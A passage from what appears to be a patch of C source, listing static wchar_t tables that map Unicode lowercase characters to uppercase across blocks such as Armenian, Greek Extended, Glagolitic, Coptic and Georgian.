+-	0x0000, 0x0480, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x048a, 0x0000, 0x048c, 0x0000, 0x048e,
+-	0x0000, 0x0490, 0x0000, 0x0492, 0x0000, 0x0494, 0x0000, 0x0496,
+-	0x0000, 0x0498, 0x0000, 0x049a, 0x0000, 0x049c, 0x0000, 0x049e,
+-	0x0000, 0x04a0, 0x0000, 0x04a2, 0x0000, 0x04a4, 0x0000, 0x04a6,
+-	0x0000, 0x04a8, 0x0000, 0x04aa, 0x0000, 0x04ac, 0x0000, 0x04ae,
+-	0x0000, 0x04b0, 0x0000, 0x04b2, 0x0000, 0x04b4, 0x0000, 0x04b6,
+-	0x0000, 0x04b8, 0x0000, 0x04ba, 0x0000, 0x04bc, 0x0000, 0x04be,
+-	0x0000, 0x0000, 0x04c1, 0x0000, 0x04c3, 0x0000, 0x04c5, 0x0000,
+-	0x04c7, 0x0000, 0x04c9, 0x0000, 0x04cb, 0x0000, 0x04cd, 0x04c0,
+-	0x0000, 0x04d0, 0x0000, 0x04d2, 0x0000, 0x04d4, 0x0000, 0x04d6,
+-	0x0000, 0x04d8, 0x0000, 0x04da, 0x0000, 0x04dc, 0x0000, 0x04de,
+-	0x0000, 0x04e0, 0x0000, 0x04e2, 0x0000, 0x04e4, 0x0000, 0x04e6,
+-	0x0000, 0x04e8, 0x0000, 0x04ea, 0x0000, 0x04ec, 0x0000, 0x04ee,
+-	0x0000, 0x04f0, 0x0000, 0x04f2, 0x0000, 0x04f4, 0x0000, 0x04f6,
+-	0x0000, 0x04f8, 0x0000, 0x04fa, 0x0000, 0x04fc, 0x0000, 0x04fe,
+-};
+-
+-static const wchar_t t2_05[256] = {
+-	0x0000, 0x0500, 0x0000, 0x0502, 0x0000, 0x0504, 0x0000, 0x0506,
+-	0x0000, 0x0508, 0x0000, 0x050a, 0x0000, 0x050c, 0x0000, 0x050e,
+-	0x0000, 0x0510, 0x0000, 0x0512, 0x0000, 0x0514, 0x0000, 0x0516,
+-	0x0000, 0x0518, 0x0000, 0x051a, 0x0000, 0x051c, 0x0000, 0x051e,
+-	0x0000, 0x0520, 0x0000, 0x0522, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0531, 0x0532, 0x0533, 0x0534, 0x0535, 0x0536, 0x0537,
+-	0x0538, 0x0539, 0x053a, 0x053b, 0x053c, 0x053d, 0x053e, 0x053f,
+-	0x0540, 0x0541, 0x0542, 0x0543, 0x0544, 0x0545, 0x0546, 0x0547,
+-	0x0548, 0x0549, 0x054a, 0x054b, 0x054c, 0x054d, 0x054e, 0x054f,
+-	0x0550, 0x0551, 0x0552, 0x0553, 0x0554, 0x0555, 0x0556, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_1d[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0xa77d, 0x0000, 0x0000, 0x0000, 0x2c63, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_1e[256] = {
+-	0x0000, 0x1e00, 0x0000, 0x1e02, 0x0000, 0x1e04, 0x0000, 0x1e06,
+-	0x0000, 0x1e08, 0x0000, 0x1e0a, 0x0000, 0x1e0c, 0x0000, 0x1e0e,
+-	0x0000, 0x1e10, 0x0000, 0x1e12, 0x0000, 0x1e14, 0x0000, 0x1e16,
+-	0x0000, 0x1e18, 0x0000, 0x1e1a, 0x0000, 0x1e1c, 0x0000, 0x1e1e,
+-	0x0000, 0x1e20, 0x0000, 0x1e22, 0x0000, 0x1e24, 0x0000, 0x1e26,
+-	0x0000, 0x1e28, 0x0000, 0x1e2a, 0x0000, 0x1e2c, 0x0000, 0x1e2e,
+-	0x0000, 0x1e30, 0x0000, 0x1e32, 0x0000, 0x1e34, 0x0000, 0x1e36,
+-	0x0000, 0x1e38, 0x0000, 0x1e3a, 0x0000, 0x1e3c, 0x0000, 0x1e3e,
+-	0x0000, 0x1e40, 0x0000, 0x1e42, 0x0000, 0x1e44, 0x0000, 0x1e46,
+-	0x0000, 0x1e48, 0x0000, 0x1e4a, 0x0000, 0x1e4c, 0x0000, 0x1e4e,
+-	0x0000, 0x1e50, 0x0000, 0x1e52, 0x0000, 0x1e54, 0x0000, 0x1e56,
+-	0x0000, 0x1e58, 0x0000, 0x1e5a, 0x0000, 0x1e5c, 0x0000, 0x1e5e,
+-	0x0000, 0x1e60, 0x0000, 0x1e62, 0x0000, 0x1e64, 0x0000, 0x1e66,
+-	0x0000, 0x1e68, 0x0000, 0x1e6a, 0x0000, 0x1e6c, 0x0000, 0x1e6e,
+-	0x0000, 0x1e70, 0x0000, 0x1e72, 0x0000, 0x1e74, 0x0000, 0x1e76,
+-	0x0000, 0x1e78, 0x0000, 0x1e7a, 0x0000, 0x1e7c, 0x0000, 0x1e7e,
+-	0x0000, 0x1e80, 0x0000, 0x1e82, 0x0000, 0x1e84, 0x0000, 0x1e86,
+-	0x0000, 0x1e88, 0x0000, 0x1e8a, 0x0000, 0x1e8c, 0x0000, 0x1e8e,
+-	0x0000, 0x1e90, 0x0000, 0x1e92, 0x0000, 0x1e94, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x1ea0, 0x0000, 0x1ea2, 0x0000, 0x1ea4, 0x0000, 0x1ea6,
+-	0x0000, 0x1ea8, 0x0000, 0x1eaa, 0x0000, 0x1eac, 0x0000, 0x1eae,
+-	0x0000, 0x1eb0, 0x0000, 0x1eb2, 0x0000, 0x1eb4, 0x0000, 0x1eb6,
+-	0x0000, 0x1eb8, 0x0000, 0x1eba, 0x0000, 0x1ebc, 0x0000, 0x1ebe,
+-	0x0000, 0x1ec0, 0x0000, 0x1ec2, 0x0000, 0x1ec4, 0x0000, 0x1ec6,
+-	0x0000, 0x1ec8, 0x0000, 0x1eca, 0x0000, 0x1ecc, 0x0000, 0x1ece,
+-	0x0000, 0x1ed0, 0x0000, 0x1ed2, 0x0000, 0x1ed4, 0x0000, 0x1ed6,
+-	0x0000, 0x1ed8, 0x0000, 0x1eda, 0x0000, 0x1edc, 0x0000, 0x1ede,
+-	0x0000, 0x1ee0, 0x0000, 0x1ee2, 0x0000, 0x1ee4, 0x0000, 0x1ee6,
+-	0x0000, 0x1ee8, 0x0000, 0x1eea, 0x0000, 0x1eec, 0x0000, 0x1eee,
+-	0x0000, 0x1ef0, 0x0000, 0x1ef2, 0x0000, 0x1ef4, 0x0000, 0x1ef6,
+-	0x0000, 0x1ef8, 0x0000, 0x1efa, 0x0000, 0x1efc, 0x0000, 0x1efe,
+-};
+-
+-static const wchar_t t2_1f[256] = {
+-	0x1f08, 0x1f09, 0x1f0a, 0x1f0b, 0x1f0c, 0x1f0d, 0x1f0e, 0x1f0f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f18, 0x1f19, 0x1f1a, 0x1f1b, 0x1f1c, 0x1f1d, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f28, 0x1f29, 0x1f2a, 0x1f2b, 0x1f2c, 0x1f2d, 0x1f2e, 0x1f2f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f38, 0x1f39, 0x1f3a, 0x1f3b, 0x1f3c, 0x1f3d, 0x1f3e, 0x1f3f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f48, 0x1f49, 0x1f4a, 0x1f4b, 0x1f4c, 0x1f4d, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x1f59, 0x0000, 0x1f5b, 0x0000, 0x1f5d, 0x0000, 0x1f5f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f68, 0x1f69, 0x1f6a, 0x1f6b, 0x1f6c, 0x1f6d, 0x1f6e, 0x1f6f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1fba, 0x1fbb, 0x1fc8, 0x1fc9, 0x1fca, 0x1fcb, 0x1fda, 0x1fdb,
+-	0x1ff8, 0x1ff9, 0x1fea, 0x1feb, 0x1ffa, 0x1ffb, 0x0000, 0x0000,
+-	0x1f88, 0x1f89, 0x1f8a, 0x1f8b, 0x1f8c, 0x1f8d, 0x1f8e, 0x1f8f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1f98, 0x1f99, 0x1f9a, 0x1f9b, 0x1f9c, 0x1f9d, 0x1f9e, 0x1f9f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1fa8, 0x1fa9, 0x1faa, 0x1fab, 0x1fac, 0x1fad, 0x1fae, 0x1faf,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1fb8, 0x1fb9, 0x0000, 0x1fbc, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x1fcc, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1fd8, 0x1fd9, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x1fe8, 0x1fe9, 0x0000, 0x0000, 0x0000, 0x1fec, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x1ffc, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_21[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2132, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x2160, 0x2161, 0x2162, 0x2163, 0x2164, 0x2165, 0x2166, 0x2167,
+-	0x2168, 0x2169, 0x216a, 0x216b, 0x216c, 0x216d, 0x216e, 0x216f,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x2183, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_24[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x24b6, 0x24b7, 0x24b8, 0x24b9, 0x24ba, 0x24bb, 0x24bc, 0x24bd,
+-	0x24be, 0x24bf, 0x24c0, 0x24c1, 0x24c2, 0x24c3, 0x24c4, 0x24c5,
+-	0x24c6, 0x24c7, 0x24c8, 0x24c9, 0x24ca, 0x24cb, 0x24cc, 0x24cd,
+-	0x24ce, 0x24cf, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_2c[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x2c00, 0x2c01, 0x2c02, 0x2c03, 0x2c04, 0x2c05, 0x2c06, 0x2c07,
+-	0x2c08, 0x2c09, 0x2c0a, 0x2c0b, 0x2c0c, 0x2c0d, 0x2c0e, 0x2c0f,
+-	0x2c10, 0x2c11, 0x2c12, 0x2c13, 0x2c14, 0x2c15, 0x2c16, 0x2c17,
+-	0x2c18, 0x2c19, 0x2c1a, 0x2c1b, 0x2c1c, 0x2c1d, 0x2c1e, 0x2c1f,
+-	0x2c20, 0x2c21, 0x2c22, 0x2c23, 0x2c24, 0x2c25, 0x2c26, 0x2c27,
+-	0x2c28, 0x2c29, 0x2c2a, 0x2c2b, 0x2c2c, 0x2c2d, 0x2c2e, 0x0000,
+-	0x0000, 0x2c60, 0x0000, 0x0000, 0x0000, 0x023a, 0x023e, 0x0000,
+-	0x2c67, 0x0000, 0x2c69, 0x0000, 0x2c6b, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x2c72, 0x0000, 0x0000, 0x2c75, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x2c80, 0x0000, 0x2c82, 0x0000, 0x2c84, 0x0000, 0x2c86,
+-	0x0000, 0x2c88, 0x0000, 0x2c8a, 0x0000, 0x2c8c, 0x0000, 0x2c8e,
+-	0x0000, 0x2c90, 0x0000, 0x2c92, 0x0000, 0x2c94, 0x0000, 0x2c96,
+-	0x0000, 0x2c98, 0x0000, 0x2c9a, 0x0000, 0x2c9c, 0x0000, 0x2c9e,
+-	0x0000, 0x2ca0, 0x0000, 0x2ca2, 0x0000, 0x2ca4, 0x0000, 0x2ca6,
+-	0x0000, 0x2ca8, 0x0000, 0x2caa, 0x0000, 0x2cac, 0x0000, 0x2cae,
+-	0x0000, 0x2cb0, 0x0000, 0x2cb2, 0x0000, 0x2cb4, 0x0000, 0x2cb6,
+-	0x0000, 0x2cb8, 0x0000, 0x2cba, 0x0000, 0x2cbc, 0x0000, 0x2cbe,
+-	0x0000, 0x2cc0, 0x0000, 0x2cc2, 0x0000, 0x2cc4, 0x0000, 0x2cc6,
+-	0x0000, 0x2cc8, 0x0000, 0x2cca, 0x0000, 0x2ccc, 0x0000, 0x2cce,
+-	0x0000, 0x2cd0, 0x0000, 0x2cd2, 0x0000, 0x2cd4, 0x0000, 0x2cd6,
+-	0x0000, 0x2cd8, 0x0000, 0x2cda, 0x0000, 0x2cdc, 0x0000, 0x2cde,
+-	0x0000, 0x2ce0, 0x0000, 0x2ce2, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_2d[256] = {
+-	0x10a0, 0x10a1, 0x10a2, 0x10a3, 0x10a4, 0x10a5, 0x10a6, 0x10a7,
+-	0x10a8, 0x10a9, 0x10aa, 0x10ab, 0x10ac, 0x10ad, 0x10ae, 0x10af,
+-	0x10b0, 0x10b1, 0x10b2, 0x10b3, 0x10b4, 0x10b5, 0x10b6, 0x10b7,
+-	0x10b8, 0x10b9, 0x10ba, 0x10bb, 0x10bc, 0x10bd, 0x10be, 0x10bf,
+-	0x10c0, 0x10c1, 0x10c2, 0x10c3, 0x10c4, 0x10c5, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-};
+-
+-static const wchar_t t2_a6[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
